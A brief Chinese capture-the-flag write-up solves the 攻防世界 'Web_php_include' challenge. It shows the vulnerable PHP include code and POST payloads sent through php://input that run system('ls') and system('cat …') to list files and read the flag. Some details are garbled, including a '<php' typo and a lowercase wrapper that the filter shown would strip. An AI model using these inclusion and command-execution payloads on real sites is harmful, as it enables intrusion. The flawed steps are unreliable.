Web_php_include 攻防世界

复制代码
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {    以是否检测到php://为判断执行循环
    $page=str_replace("php://", "", $page);//传入空值,替换
}
include($page);
?>

综上分析,get方式好像挺难去看到这个flag的,因为这种代码下的flag通常放在一个文件中,需要先展开ls,然后在cat查看。那我们就尝试用post传参

准备好一个Firefox 一个max hackbar

通过php伪协议php://input

首先post传入第一个命令 ,这个命令用来展开目录

复制代码
<php
system("ls")
?>

随后得到fl4gisisish3r3.php 一般这种文件就是flag,

我们使用

复制代码
<?php
system("cat fl4gisisish3r3.php ")//查看文件下的flag
?>

有的flag会直接在屏幕上,有的就藏在背后i的代码里,这个就是

相关推荐
蓝之白17 小时前
Web11-备份是个好习惯
web安全·ctf
Z3r4y18 小时前
【Web】四川省赛 2025 wp
web·ctf·wp·四川省赛·省赛2025
李白你好1 天前
一款轻量级的CTF/渗透测试Fuzz工具
ctf
三七吃山漆1 天前
攻防世界——safer-than-rot13
ctf
de之梦-御风2 天前
【WebAPI 模拟器】.NET 8/9 + Minimal API + Swagger + DI + WPF Host
.net·wpf·web
saulgoodman-q3 天前
Pwncollege V8 Exploitation (下) 完结散花
网络安全·pwn·ctf
曲幽3 天前
Flask登录验证实战:从零构建一个基础的账号密码登录系统
python·flask·web·session·username·login
WebRuntime4 天前
问世间,exe是何物?直教AI沉默、Web寡言(4)
javascript·c#·.net·web
带刺的坐椅4 天前
超越 SpringBoot 4.0了吗?OpenSolon v3.8, v3.7.4, v3.6.7 发布
java·ai·springboot·web·solon·flow·mcp
三七吃山漆4 天前
攻防世界——ics-05
网络·安全·web安全·ctf